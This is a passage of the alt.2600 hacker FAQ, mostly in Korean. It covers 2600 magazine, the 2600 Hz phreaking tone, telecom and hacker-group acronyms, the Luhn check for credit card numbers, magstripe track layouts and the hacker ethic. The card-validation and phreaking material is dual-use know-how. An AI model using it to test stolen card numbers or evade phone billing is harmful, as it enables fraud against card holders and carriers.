*Integrity in Automated Information Systems

*C Technical Report 39-92

*The Design and Evaluation of INFOSEC systems: The Computer Security

*Contributions to the Composition Discussion

NTISSAM COMPUSEC/1-87

Advisory Memorandum on Office Automation Security Guideline

--

You can get your own free copy of any or all of the books by writing

or calling:

INFOSEC Awareness Division

ATTN: X711/IAOC

Fort George G. Meade, MD 20755-6000

Barbara Keller

(410) 766-8729

If you ask to be put on the mailing list, you'll get a copy of each new

book as it comes out (typically a couple a year).

[* == I have not personally seen this book]

[+ == I have not personally seen this book, and I believe it may not]

[ be available]




alt.2600이란 무엇인가?

Alt.2600는 Usenet newsgroup으로 2600 잡지에 대한 논의를 위한 내용을 포함한다.

Atari의 2600 게임 머신을 위한 잡지가 아니다. Len@netsys.com이 Emmanuel Goldstein의 추전에 의해 이 뉴스그룹을 만들었다. Emmanuel은 2600의 편집자/발행인이다. Atari 머신에 대한 포스팅이 빗발친 다음 alt.atri.2600이 alt.2600으로 잘못들어온 포스팅을 받기 위해 만들어졌다. Atari 2600 사람들은 rec.games.video.classic로 가기 바란다.


2600은 무엇을 의미하나?

2600Hz는 전화 프리커(phreak)이 80년대에 사용하던 것이고 현재는 일부의 사람들이 사용하고 있다. 2600 헤르츠의 음은 네트워크를 탐험하는 첫 번째 단계이다.

A note from Emmanuel Goldstein:

"The Atari 2600 has NOTHING to do with blue boxes or telephones

or the 2600 hertz tone. The 2600 hertz tone was simply the first

step towards exploring the network. If you were successful at

getting a toll call to drop, then billing would stop at that

point but there would be billing for the number already dialed

up until the point of seizure. 800 numbers and long distance

information were both free in the past and records of who called

what were either non-existent or very obscure with regards to

these numbers. This, naturally, made them more popular than

numbers that showed up on a bill, even if it was only for

a minute. Today, many 800 numbers go overseas, which provides

a quick and free way into another country's phone system

which may be more open for exploration."


2600이 온라인 형태로 존재하는가?

없음.


서점에서 2600을 구할 수 없다면 어떻게 해야 하나?

구독하라. 또는 2600가 있어야 할 서점을 2600에 알려주라. 서점이름과 주소를 빼먹지 말 것.


2600을 가판대에서 사는 것보다 주문하는 것이 왜 더 비싼가?

Emmauel Goldstein의 말 :

2600을 1988년부터 가판대에서 똑같은 가격 4달러에 팔아왔다. 그리고 할 수 있는 한 계속 그 가격으로 판매하고 싶다. 동시에 구독자에게는 21달러가 정당한 가격이다. 이 가격에는 우표와 관리 등의 가격이 포함된다. 구독자는 어디서 잡지를 구해야 하는지 걱정할 필요가 없다. 가판대에서 팔기 몇주전에 잡지를 볼 수 있고 2600 시장의 무료광고를 볼 수 있다.

이러한 것은 출판 산업에서 흔한 일은 아니다. 뉴욕 타임즈는 예를 들어 가판대에서 $156 이 들어야 살 수 있고, 집에 배달할 경우 $234.75이다.


기타

XXX는 무엇을 의미하나?

TLA Three Letter Acronym

ACL Access Control List

PIN Personal Identification Number

TCB Trusted Computing Base

ALRU Automatic Line Record Update

AN Associated Number

ARSB Automated Repair Service Bureau

ATH Abbreviated Trouble History

BOC Bell Operating Company

BOR Basic Output Report

BOSS Business Office Servicing System

CA Cable

COE Central Office Equipment

COSMOS Computer System for Main Frame Operations

CMC Construction Maintenance Center

CNID Calling Number IDentification

CO Central Office

COCOT Customer Owned Coin Operated Telephone

CRSAB Centralized Repair Service Answering Bureau

DID Direct Inbound Dialing

DDD Direct Distance Dialing

ECC Enter Cable Change

LD Long Distance

LMOS Loop Maintenance Operations System

MLT Mechanized Loop Testing

NPA Numbering Plan Area

PBX Private Branch Exchange

POTS Plain Old Telephone Service

RBOC Regional Bell Operating Company

RSB Repair Service Bureau

SS Special Service

TAS Telephone Answering Service

TH Trouble History

TREAT Trouble Report Evaluation and Analysis Tool

LOD Legion of Doom

HFC Hell Fire Club

TNO The New Order

ACiD Ansi Creators in Demand

CCi Cybercrime International

FLT Fairlight

iCE Insane Creators Enterprise

iNC International Network of Crackers

NTA The Nocturnal Trading Alliance

PDX Paradox

PE Public Enemy

PSY Psychose

QTX Quartex

RZR Razor (1911)

S!P Supr!se Productions

TDT The Dream Team

THG The Humble Guys

THP The Hill People

TRSI Tristar Red Sector Inc.

UUDW Union of United Death Workers



내가 바른 신용카드 번호를 가지고 있는지 어떻게 획인하나?

신용카드는 Luhn Check Digit Algorithm을 사용한다. 이 알고리즘은 주요 목적은 데이터의 오류를 찾는 것이다. 그리고 약한 보안 기능도 가지고 있다.

짝수의 자리수를 가지는 번호의 카드에 대해서, 홀 수인 자리의 숫자를 2배로하고 9보다 큰 숫자의 경우 9를 뺀다. 짝수 자리와 2배한 홀수자리 수를 더하면 그 결과가 10의 배수가 되어야 한다. 그렇지 않다면 잘못된 카드이다. 카드가 홀수자리의 번호라면, 짝수 자리 숫자를 2배해서 똑같이 계산하면 된다.

자기띠의 데이터 배치는 어떤 것인가?

표준 카드는 3개의 트랙또는 3개의 트랙의 조합이 있다.

트랙 1은 처음으로 표준화된 트랙이다. 국제 항공 운수 연합(Internetional Air Transportation Association; IATA)에서 개발하였고 아직도 그 목적으로 사용하기 위해 예약되어 있다. 210bpi로 79자정도가 들어간다. 주 계정 번호와(18 자리까지) 이름(26자의 영문 숫자)를 포함한다.

트랙 2는 미국 은행가 연합(American Bankers Association; ABA)에서 온라인 트랜잭션을 위해서 개발했다. 75bpi로 40개의 숫자를 넣을 수 있는 공간이 있다. 암호화된 PIN과, 국가번호, 통화 단위, 허용된 금액, 계정정도와 다른 제한 사항이 들어 있다.

자세한 것은 ANSI/ISO 7811/1-5 를 읽기 바란다. 이 문서는 미국 은행가 연합에서 볼 수 있다.


해킹의 윤리는 무엇인가?

Hackers : Heroes of the Computer Revolution, Steven Levy 저발췌

컴퓨터에 접근하는 것 - 그리고 세상이 어떻게 돌아가는지 알려줄 수 있는 어떤 것 -은 전체적이고 무제한이어야 한다. 항상 실제적인 명령에 따른다.

모든 정보는 자유로와야 한다.

공권력을 불신한다. 지역분권을 지향한다.

해커는 해킹 능력으로 평가되어야지 학위나, 나이, 인종, 지위와 같은 잘못된 기준으로 평가되어서는 안 된다.

컴퓨터에서 미와 예술을 창조할 수 있다.

컴퓨터는 인생을 나아지게 한다.


sqCLOUD12 sqCLOUD21